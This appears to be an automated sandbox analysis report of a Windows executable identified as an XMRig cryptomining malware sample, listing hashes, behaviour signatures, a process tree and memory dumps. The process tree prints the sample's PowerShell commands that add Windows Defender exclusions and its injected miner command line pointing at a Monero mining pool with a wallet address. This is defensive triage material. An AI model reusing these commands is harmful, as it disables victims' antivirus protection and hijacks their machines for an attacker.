Analysis

  • max time kernel
    107s
  • max time network
    120s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-11-2024 22:25

General

  • Target

    0c65484e7f517cfb24dff4231117a5f115e094f12a6b99aa0c26d322f6dbfb5f.exe

  • Size

    2.1MB

  • MD5

    ebb42b2a3a147e19b72b77a3977600c9

  • SHA1

    8e4e8e2384a226ff0840b34610c8ca2ffa4c9240

  • SHA256

    0c65484e7f517cfb24dff4231117a5f115e094f12a6b99aa0c26d322f6dbfb5f

  • SHA512

    0b54d7ffaff3e44999fde5c74e3a9d3d30370cf1fc9c99268321c815a76c47ed2b906e131e43f8fe1443e1167372bd68ee2f52d5337ff16da858f380d42ddb9b

  • SSDEEP

    49152:KLn083VH2ecNONSbowqPObPca9WO7oB34W0OIFXhE9+oAnTAXUbI:QLy5PLLoB34WNIfE9rWs0I

Score
10/10

Malware Config

Signatures

  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 14 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0c65484e7f517cfb24dff4231117a5f115e094f12a6b99aa0c26d322f6dbfb5f.exe
    "C:\Users\Admin\AppData\Local\Temp\0c65484e7f517cfb24dff4231117a5f115e094f12a6b99aa0c26d322f6dbfb5f.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2708
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1968
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3528
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1544
    • C:\Windows\explorer.exe
      C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14433 --user=4A7eDpU3RSEEt9kX8KQwwkfmFwWRYQ5EzUe54qzu9HtwVTbHyWmjUu5BJeHjQgGFZv9wv25i7UvRTAzJRKNpBH6s3a4ivKe --pass= --cpu-max-threads-hint=80 --tls
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3416

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    d85ba6ff808d9e5444a4b369f5bc2730

    SHA1

    31aa9d96590fff6981b315e0b391b575e4c0804a

    SHA256

    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

    SHA512

    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    2979eabc783eaca50de7be23dd4eafcf

    SHA1

    d709ce5f3a06b7958a67e20870bfd95b83cad2ea

    SHA256

    006cca90e78fbb571532a83082ac6712721a34ea4b21f490058ffb3f521f4903

    SHA512

    92bc433990572d9427d0c93eef9bd1cc23fa00ed60dd0c9c983d87d3421e02ce3f156c6f88fe916ef6782dbf185cbce083bc0094f8c527f302be6a37d1c53aba

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pqrzawtm.3ee.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/2708-23-0x00007FFB476E0000-0x00007FFB481A1000-memory.dmp

    Filesize

    10.8MB

  • memory/2708-2-0x00000000010B0000-0x00000000010C2000-memory.dmp

    Filesize

    72KB

  • memory/2708-1-0x00000000000D0000-0x00000000002E8000-memory.dmp

    Filesize

    2.1MB

  • memory/2708-4-0x00007FFB476E0000-0x00007FFB481A1000-memory.dmp

    Filesize

    10.8MB

  • memory/2708-0-0x00007FFB476E3000-0x00007FFB476E5000-memory.dmp

    Filesize

    8KB

  • memory/3416-20-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/3416-30-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/3416-22-0x0000000002C80000-0x0000000002CA0000-memory.dmp

    Filesize

    128KB

  • memory/3416-21-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/3416-24-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/3416-18-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/3416-50-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/3416-45-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/3416-29-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/3416-28-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/3416-31-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/3416-49-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/3416-27-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/3416-48-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/3416-47-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/3528-17-0x00007FFB476E0000-0x00007FFB481A1000-memory.dmp

    Filesize

    10.8MB

  • memory/3528-14-0x000001B23B3F0000-0x000001B23B412000-memory.dmp

    Filesize

    136KB

  • memory/3528-15-0x00007FFB476E0000-0x00007FFB481A1000-memory.dmp

    Filesize

    10.8MB

  • memory/3528-32-0x00007FFB476E0000-0x00007FFB481A1000-memory.dmp

    Filesize

    10.8MB

  • memory/3528-16-0x00007FFB476E0000-0x00007FFB481A1000-memory.dmp

    Filesize

    10.8MB